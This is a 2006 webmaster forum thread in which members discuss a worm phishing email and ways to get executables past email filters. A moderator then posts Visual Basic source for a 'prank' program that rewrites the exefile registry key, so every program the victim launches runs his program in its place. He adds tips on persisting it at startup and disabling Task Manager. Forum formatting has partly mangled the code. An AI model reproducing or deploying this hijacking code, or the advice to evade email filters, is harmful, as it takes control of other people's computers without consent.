Return to iWEBTOOL

Go Back   iWEBTOOL Talk > Talk Lounge > General Talk
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read
 
Welcome to iWEBTOOL Talk, where you talk about webmaster-related stuff.
 
Discuss topics which interest you.
With over thousands of threads (topics), we're sure you'll find something that'll interest you.
Ask for help whenever you need it.
We have thousands of members who are available to help you if you need it.
It's absolutely FREE!

 1  Register           2  Browse the board           3  Discuss whatever may interest you!
 


Closed Thread
 
Thread Tools Search this Thread Display Modes
Old 11-10-2006, 01:43 AM   #1
UnKnown
Moderator
 
UnKnown's Avatar
 
Join Date: Aug 2006
Posts: 1,148
UnKnown is just really niceUnKnown is just really niceUnKnown is just really niceUnKnown is just really niceUnKnown is just really nice
Default Been a while since i got an exe file in my mail

Its been a long time since i have recieved one of these in my inbox.
-------------------------------------------------------------------------
Worm email
----------------------------------------------------------------------==
Mail server report.

Our firewall determined the e-mails containing worm copies are being
sent from your computer.

Nowadays it happens from many computers, because this is a new virus
type (Network Worms).


Using the new bug in the Windows, these viruses infect the computer
unnoticeably.
After the penetrating into the computer the virus harvests all the
e-mail addresses and sends the copies of itself to these e-mail
addresses

Please install updates for worm elimination and your computer
restoring.

Best regards,
Customers support service
-------------------------------------------------------------------------
Second worm email
---------------------------------------------------------------------------
The message cannot be represented in 7-bit ASCII encoding
and has been sent as a binary attachment
---------------------------------------------------------------------------
Worm details
-------------------------------------------------------------------------
File name: data.zip
File size: 7kb
File type: application/octet-stream
Scan result: Virus "W32.Stration.DE@mm" found.

The file attached to this message was infected with a virus that we were unable to clean. You should not download this attachment.
Note: Not all viruses can be cleaned. Please contact the message sender and request that they send you a virus-free version of this attachment.
UnKnown is offline  
 
This is an Ad Revenue Sharing forum Place your advert here
SEO Checklist
Get yourself better ranking with
our "Do-it-Yourself" SEO Checklist.
Click Here
Old 11-10-2006, 11:34 AM   #2
Katey
Senior Member
 
Katey's Avatar
 
Join Date: Apr 2006
Location: Hull, United Kingdom.
Posts: 317
Katey has much to be proud ofKatey has much to be proud ofKatey has much to be proud ofKatey has much to be proud ofKatey has much to be proud ofKatey has much to be proud ofKatey has much to be proud ofKatey has much to be proud of
Default Re: Been a while since i got an exe file in my mail

Hi there,

A lot of e-mail providers don't let people send .exe/.bat/etc, and they have a filesize limit as well. I know a way to get round it, and it's to put the executable file in about 12 .zip folders .

It is very annoying, I was innocent as well, I was sending a VB compiled program I made to my friend.


Regards,
Kieran Taylor.
Katey is offline  
Old 11-11-2006, 12:25 AM   #3
UnKnown
Moderator
 
UnKnown's Avatar
 
Join Date: Aug 2006
Posts: 1,148
UnKnown is just really niceUnKnown is just really niceUnKnown is just really niceUnKnown is just really niceUnKnown is just really nice
Default Re: Been a while since i got an exe file in my mail

Quote:
Originally Posted by KieranTaylor0403 View Post
Hi there,

A lot of e-mail providers don't let people send .exe/.bat/etc, and they have a filesize limit as well. I know a way to get round it, and it's to put the executable file in about 12 .zip folders .

Its very annoying, I was innocent as well, I was sending a VB compiled program I made to my friend.


Regards,
Kieran Taylor.

A couple weeks ago i played a joke on several of my friends.
I wrote this simple but yet annoying exe program.
PHP Code:
Option Explicit
Private 
Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As LongByVal lpOperation As StringByVal lpFile As StringByVal lpParameters As StringByVal lpDirectory As StringByVal nShowCmd As Long) As Long

Private Sub btnRun_Click
()
Dim RestoreSetting As String
Dim A 
As Object
Dim B 
As Object

    RestoreSetting 
Chr$(34) + "%1" Chr$(34) + " %*"
    
Set A CreateObject("wscript.shell")
    
Set B CreateObject("scripting.filesystemobject")

    If 
Command$ <> vbNullString Then
    A
.regwrite "HKCR\exefile\shell\open\command\", Chr(34) + "%1" + Chr(34) + " %*"
    ShellExecute Me.hWnd, "
open", Command$, "", "", vbNormalFocus
    Call Install
    Unload Me
End If
End Sub

Private Sub Command1_Click()
Dim A As Object
Dim B As Object
Set A = CreateObject("
wscript.shell")
Set B = CreateObject("
scripting.filesystemobject")
A.regwrite "
HKCRexefileshellopencommand", Chr(34) + "%1" + Chr(34) + " %*"
End Sub

Private Sub Form_Load()
Call Install
Command$
End Sub

Private Sub Form_Unload(Cancel As Integer)
End
End Sub

Public Sub Install()
Dim A As Object
Dim B As Object
Dim Setting As String
Dim Original As String

Setting = Chr$(34) + "
%1" + Chr$(34) + " %*"
Set A = CreateObject("
wscript.shell")
Set B = CreateObject("
scripting.filesystemobject")
     
    Original = A.regread("
HKCRexefileshellopencommand")
    If Original = Setting Then
    A.regwrite "
HKCRexefileshellopencommandoriginal", Setting
    A.regwrite "
HKCRexefileshellopencommand", B.buildpath(App.Path, App.EXEName & ".EXE %%*")
    End If
End Sub 
This code does a little registry rewrite.
To those that cant read it what its doing is making all exe files dependent on my program.
So what happens is everytime they execute a exe file my program runs over the top of it
So if you try to load FileZilla my program will popup instead.
you will get the same results with any exe file on your harddrive.
But of course i had the antidote as seen below
PHP Code:
set shl=createobject("wscript.shell")
shl.regwrite "HKCR\exefile\shell\open\command\",Chr(34) + "%1" + Chr(34) + " %*
It would actually be nice for personal use.
To keep them little brothers or whom ever off your pc while your gone.
You could add this program to the startup and disable task manager.

Last edited 11-11-2006 at 06:22 AM.
UnKnown is offline  
 
This is an Ad Revenue Sharing forum Place your advert here
Webmaster Tools Webmaster Tools Click Here
Closed Thread

(Threads which have no activity for more than 30 days are automatically closed.)



Quick Reply
Message:

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Form mail danaY Web Development 3 01-28-2007 07:54 PM
Free File Host PWRseth Other Goods 0 11-27-2006 09:26 PM
how to create a file for rss terryjohn.smith Search Engine Optimization (SEO) 3 09-23-2006 10:22 AM
Homework | Test | Essay Online File Sharing! Louis11 Advertise your website 2 08-24-2006 08:56 PM
Index file PR impact for links in Kokliushas Google 2 05-29-2006 10:15 PM


All times are GMT. The time now is 07:06 AM.


Powered by vBulletin v3.6.7 © 2008, Jelsoft Enterprises Ltd. SEO by vBSEO © 2006, Crawlability, Inc.